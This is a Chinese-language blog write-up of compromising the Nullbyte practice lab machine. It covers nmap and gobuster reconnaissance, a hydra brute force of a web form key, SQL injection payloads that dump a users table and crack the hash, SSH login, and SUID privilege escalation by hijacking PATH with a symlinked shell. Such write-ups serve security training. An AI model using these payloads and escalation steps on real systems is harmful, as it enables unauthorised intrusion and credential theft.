Nullbyte--打靶笔记
|
安全相关,靶场复现
|
418

369 字
|
4 分钟

靶机设置

网络适配调整为NAT模式

Nmap扫描

主机发现

sudo nmap -sn 192.168.9.150/24

image

image

新增IP为靶机IP:192.168.9.162

TCP开放端口扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.9.162

image

80,111,777,59573 四个端口

UDP开放端口扫描

sudo nmap -sU --min-rate 10000 -p- 192.168.9.162

image

TCP详细信息扫描

sudo nmap -sT -sV -sC -O -p80,111,777,59573 192.168.9.162

image

777是ssh
检索发现rpcbind是用来进行消息通知服务的,而且存在漏洞,不过不道是不是这个版本的。

vuln漏洞脚本扫描

sudo nmap -sT --script=vuln -p80,111,777,59573 192.168.9.162 -oA nmap/vuln

image
image

/phpmyadmin​,/uploads

Getshell

80-初步浏览

直接看80吧

image

这意思是,扫描目录?

不过扫一个吧:sudo gobuster dir -u http://192.168.9.162/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image

/uploads​目录不允许访问。

再细节看眼封面图片吧:

wget http://192.168.9.162/main.gif
file main.gif
exiftool main.gif

image

发现一串字符:P-): kzMb5nVYJw 或者 kzMb5nVYJw

尝试解码发现并不是base64

80-hydra表单爆破

遂把这个当做路径访问一下试试:http://192.168.9.162/kzMb5nVYJw/

image

F12看看:

image

说密码并不复杂。

爆破,上!

hydra 192.168.9.162 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l user -P /usr
# http-form-post:表示破解方式是采用http的post方式提交表单密码
# /kzMb5nVYJw/index.php:指定路径
# key=:指定参数
# ^PASS^:指定改变的参数
# invalid key:无效的过滤
# -l:用于指定用户名。虽然这个网页没有,但是hydra语法要求必须有,因此随便写一个占位即可
# -P:指定字典

image

key:elite

80-sql注入

输入后跳转界面:

image

image

怀疑sql注入,试试:

image

3列:?usrtosearch=nullbyte" order by 3--+

image

image

无回显,用报错注入:?usrtosearch=nullbyte" union select 1,2,datadase() --+

image

?usrtosearch=nullbyte" union select 1,2,extractValue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

image

?usrtosearch=nullbyte" union select 1,2,extractValue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

image

?usrtosearch=nullbyte" union select 1,2,extractValue(1,concat(0x7e,(select group_concat(id,'~',user,'~',pass,'~',position) from users))) --+

image

切页面突然发现其实是有回显的:

image

?usrtosearch=" union select 1,2,group_concat(id,'~',user,'~',pass,'~',position) from users --+

image

1~ramses~YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

试了一下ssh,不对

尝试base64

image

c6d6bd7ebf806f43c76acc3681703b81

image

尝试hashcat解码:hashcat -a 0 -m 0 c6d6bd7ebf806f43c76acc3681703b81 /usr/share/wordlists/rockyou.txt

image


ssh登陆尝试:

ssh ramses@192.168.9.162 -p 777
# 密码:omega

image

提权

基础信息

image

image

image

root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash

image

image

image

image

​​

suid提权

ln -s /bin/sh ps
# 软连接

export PATH=.:$PATH
# 把当前路径加入到PATH
./procwatch

image

image

writeup打靶笔记网络安全
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇